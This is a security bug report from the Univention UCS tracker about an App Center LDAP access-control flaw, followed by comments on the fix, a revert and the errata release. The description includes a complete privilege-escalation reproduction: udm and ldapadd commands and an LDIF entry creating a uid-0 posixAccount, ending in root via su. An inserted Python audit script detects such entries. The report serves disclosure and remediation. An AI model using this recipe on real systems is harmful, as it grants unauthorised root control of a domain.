Bug 41724 - univention-appcenter - take over complete domain as memberserver
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: LDAP
Version: UCS 4.1
Hardware: Other Linux
Importance: P5 critical
Target Milestone: UCS 4.1-2-errata
Assigned To: Florian Best
QA Contact: Dirk Wiesenthal
Duplicates: 32886
Depends on: 41715 41797
Reported: 2016-07-04 14:39 CEST by Florian Best
Modified: 2021-06-23 07:29 CEST (History)
What kind of report is it?: Security Issue
Bug group (optional): Security
Description Florian Best univentionstaff 2016-07-04 14:39:11 CEST
The ACL rules in the package univention-appcenter have to be adjusted.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
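An audit check added here as an example; it is not code from the bug report or from UCS. It reads LDIF (a constructed sample modelled on the entry above, with a made-up password hash) and flags posixAccount entries that sit outside the user and computer containers or carry uidNumber/gidNumber 0, the combination the ACL gap let an app object introduce. The container names and the LDAP base are assumptions.

```python
import base64

# Assumption: posixAccount entries are only expected below these containers.
ACCOUNT_CONTAINERS = ("cn=users", "cn=computers")

# Constructed sample LDIF: the report's rogue app entry (password hash made up) and a normal user.
SAMPLE_LDIF = """\
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
userPassword:: e2NyeXB0fXNlY3JldA==

dn: uid=alice,cn=users,dc=school,dc=local
objectClass: posixAccount
uid: alice
uidNumber: 2001
gidNumber: 5001
"""


def parse_ldif(text):
    """Minimal LDIF reader (no line folding); attribute names are lower-cased."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            attr, value = line.split(":", 1)
            if value.startswith(":"):  # '::' marks a base64-encoded value
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            entry.setdefault(attr.lower(), []).append(value.strip())
        entries.append(entry)
    return entries


def audit(entries):
    """Return (dn, reason) pairs for posixAccount entries that should not exist."""
    findings = []
    for e in entries:
        dn = e["dn"][0]
        if "posixaccount" not in {c.lower() for c in e.get("objectclass", [])}:
            continue
        parents = [r.strip().lower() for r in dn.split(",")[1:]]
        if not any(c in parents for c in ACCOUNT_CONTAINERS):
            findings.append((dn, "posixAccount outside user/computer containers"))
        if e.get("uidnumber") == ["0"] or e.get("gidnumber") == ["0"]:
            findings.append((dn, "uidNumber/gidNumber 0 maps to root via NSS"))
    return findings
```

Run against a real `ldapsearch -LLL` dump this reports every account-like entry an NSS lookup would accept but that no admin tool created.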
Comment 1 Florian Best univentionstaff 2016-07-04 19:06:37 CEST
*** Bug 32886 has been marked as a duplicate of this bug. ***
Comment 2 Florian Best univentionstaff 2016-07-04 19:58:03 CEST
univention-appcenter (5.0.21-14):
r70813 | Bug #41724: restrict access to univentionApp object class

univention-appcenter.yaml:
r70817 | YAML Bug #41724
Comment 3 Dirk Wiesenthal univentionstaff 2016-07-11 22:04:23 CEST
Tested it. One may still install Apps, they can be registered. Also, the example exploit is not possible anymore. Normally: VERIFIED. But we have >50 tests failing since the Bug was RESOLVED and they do not go away. I have reverted the patch to see whether this indeed has something to do with this very bug.
Comment 4 Florian Best univentionstaff 2016-07-12 07:12:49 CEST
(In reply to Dirk Wiesenthal from comment #3)
> Tested it. One may still install Apps, they can be registered. Also, the
> example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> tests failing since the Bug was RESOLVED and they do not go away. I have
> reverted the patch to see whether this indeed has something to do with this
> very bug.

There are 32 fewer errors this night. But I guess this is caused by svn r70925 - not the revert.
Comment 5 Stefan Gohmann univentionstaff 2016-07-12 07:16:52 CEST
(In reply to Florian Best from comment #4)
> (In reply to Dirk Wiesenthal from comment #3)
> > Tested it. One may still install Apps, they can be registered. Also, the
> > example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> > tests failing since the Bug was RESOLVED and they do not go away. I have
> > reverted the patch to see whether this indeed has something to do with this
> > very bug.
> 
> There are 32 less errors this night. But I guess this is caused by svn
> r70925 - not the revert.

Yes, the revert was too late for the last Jenkins run.
Comment 6 Florian Best univentionstaff 2016-07-12 07:42:24 CEST
(In reply to Stefan Gohmann from comment #5)
> (In reply to Florian Best from comment #4)
> > (In reply to Dirk Wiesenthal from comment #3)
> > > Tested it. One may still install Apps, they can be registered. Also, the
> > > example exploit is not possible anymore. Normally: VERIFIED. But we have >50
> > > tests failing since the Bug was RESOLVED and they do not go away. I have
> > > reverted the patch to see whether this indeed has something to do with this
> > > very bug.
> > 
> > There are 32 less errors this night. But I guess this is caused by svn
> > r70925 - not the revert.
> 
> Yes, the revert was to late for the last Jenkins run.

Yes, the old version was installed in the tests:
univention-management-console-module-appcenter 5.0.21-14.182.201607041949

I will revert the revert somewhen today. There are still ~6 different tests failing due to Bug #41715.
Comment 7 Florian Best univentionstaff 2016-07-12 15:47:48 CEST
univention-appcenter (5.0.21-17):
r70935 | Revert "* Bug #41724: Revert"
Comment 8 Dirk Wiesenthal univentionstaff 2016-07-18 11:51:06 CEST
OK works.
Tests are fine again.
Comment 9 Janek Walkenhorst univentionstaff 2016-07-21 15:16:23 CEST
<http://errata.software-univention.de/ucs/4.1/218.html>